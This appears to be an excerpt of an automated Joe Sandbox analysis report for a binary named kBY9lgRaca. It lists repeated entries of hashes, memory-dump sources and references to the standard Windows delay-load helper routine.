                                                                  • Opcode Fuzzy Hash: a8f37a70103835f2d16d86d4001929c88148015000012a117c2602aa10c69e6c
                                                                  • Instruction Fuzzy Hash: 0EB012C22692407C3144915BEC43E37012CC0C2B14330423EF804C11C0EC440CC11531
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: d48e74b56fa4b87eddb38f80606997d87c2df2136c4c50a827ecb678a245fac8
                                                                  • Instruction ID: 0e80c5fe5203d51305936f7369f3ee188f93d6e8dc3855b46c5feb9907d06a3f
                                                                  • Opcode Fuzzy Hash: d48e74b56fa4b87eddb38f80606997d87c2df2136c4c50a827ecb678a245fac8
                                                                  • Instruction Fuzzy Hash: CBB012C1259240BC3204520EEC03E3B054CC0C7F14330423EF404C01C0EC400D851431
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: f8845af692487e5626458f689209f8abf9b6e3375238714e67a30200eca0e3f5
                                                                  • Instruction ID: d6c02e351929cd9759d6591211e5460b248188ad4f6bf87a4d45b703c9d5ee17
                                                                  • Opcode Fuzzy Hash: f8845af692487e5626458f689209f8abf9b6e3375238714e67a30200eca0e3f5
                                                                  • Instruction Fuzzy Hash: BDB012C1259140BC3104522AAC06E3B010CC0C3F14330403EF414C04C1EC400D451431
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: b5b8a1fdda0cbcbf668a6f86263372b12e0e7b797cd184b0dcafbb7120d78c82
                                                                  • Instruction ID: 7ef7c2e4d7936b4774bb326eb17620c84f2dbc75c4d42a7fc3470788213f7b91
                                                                  • Opcode Fuzzy Hash: b5b8a1fdda0cbcbf668a6f86263372b12e0e7b797cd184b0dcafbb7120d78c82
                                                                  • Instruction Fuzzy Hash: D9B012C1759180BD3104520EAD02E3B054CC0C7F14330803EF404C01C0EC400C421431
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 308f833f41ab627fa8138252d269599627f6fc6eea340fc0fb8b082bae7acef7
                                                                  • Instruction ID: 4725efecfdbed1096429c5cceb3263aa453581ede6406dafcee7ba7fbec1daa3
                                                                  • Opcode Fuzzy Hash: 308f833f41ab627fa8138252d269599627f6fc6eea340fc0fb8b082bae7acef7
                                                                  • Instruction Fuzzy Hash: 61B012C1759140BE3104920EAC02F3B014CC0C7F14330403EF404C01C0EC400C411431
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 0c92cbb80bf80a5dd20944d6f134612469a68b6ea7c9dc3ac0cbd094257bc6a6
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 0c92cbb80bf80a5dd20944d6f134612469a68b6ea7c9dc3ac0cbd094257bc6a6
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 18b8b51339e80e662ebaad874a1294890f7bead6a18e66c558fc732ddb17d22d
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 18b8b51339e80e662ebaad874a1294890f7bead6a18e66c558fc732ddb17d22d
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 3666c71275f34606f5a0d3ba7db7c7031d3ca8160527d411c808e672d61287a1
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 3666c71275f34606f5a0d3ba7db7c7031d3ca8160527d411c808e672d61287a1
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 0bf90d08686c9c930a51d3f661ec329e26125bc4b249950e7c242cee2447debe
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 0bf90d08686c9c930a51d3f661ec329e26125bc4b249950e7c242cee2447debe
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 54413d56ae9f1a28f56bbb7890c3339537e5cb61646cf1cb4a6d7a73df3afade
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 54413d56ae9f1a28f56bbb7890c3339537e5cb61646cf1cb4a6d7a73df3afade
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 6bf05e4e0ce9ecd9e1302834abb034ef47a54bdf7f08e6b53017908479547289
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 6bf05e4e0ce9ecd9e1302834abb034ef47a54bdf7f08e6b53017908479547289
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 6ae70d1ffd2c50a8a3667da5c3a672504070af05e108b49e5ad857cd2a6c4b66
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 6ae70d1ffd2c50a8a3667da5c3a672504070af05e108b49e5ad857cd2a6c4b66
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 2f73fc0d3a6c3f7d9c222b4c0697d0a3bfac184e115613d2a879017151cab376
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: 2f73fc0d3a6c3f7d9c222b4c0697d0a3bfac184e115613d2a879017151cab376
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: de764ce2ef632b26b3e35063d263154e75822ddef2112103bc2cff578fd4e934
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: de764ce2ef632b26b3e35063d263154e75822ddef2112103bc2cff578fd4e934
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: eccaa91c88f840cd238cb038f62ecb2276e61c176e05102dc24bd4925b1baf56
                                                                  • Instruction ID: c6e13a0329bdf8905077562b54aad140eb25faa00ef952276b190241cb41a3a9
                                                                  • Opcode Fuzzy Hash: eccaa91c88f840cd238cb038f62ecb2276e61c176e05102dc24bd4925b1baf56
                                                                  • Instruction Fuzzy Hash: EBA001E62AE182BC35096257AD46E3B121DC5C6B65334897EF816C44C2A8907A566871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: e466b1e89588e9c9227484345175491cb569233ad993720bccfd0c805bf89362
                                                                  • Instruction ID: d34bcb5a5d5507ac190010d61a35d336b0a9f2b49dc704c18e97222e1660dbd0
                                                                  • Opcode Fuzzy Hash: e466b1e89588e9c9227484345175491cb569233ad993720bccfd0c805bf89362
                                                                  • Instruction Fuzzy Hash: 30A001E62AA1D27D32186256AD47E3B121DC4C2B29334956EF825A54D1AC8028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
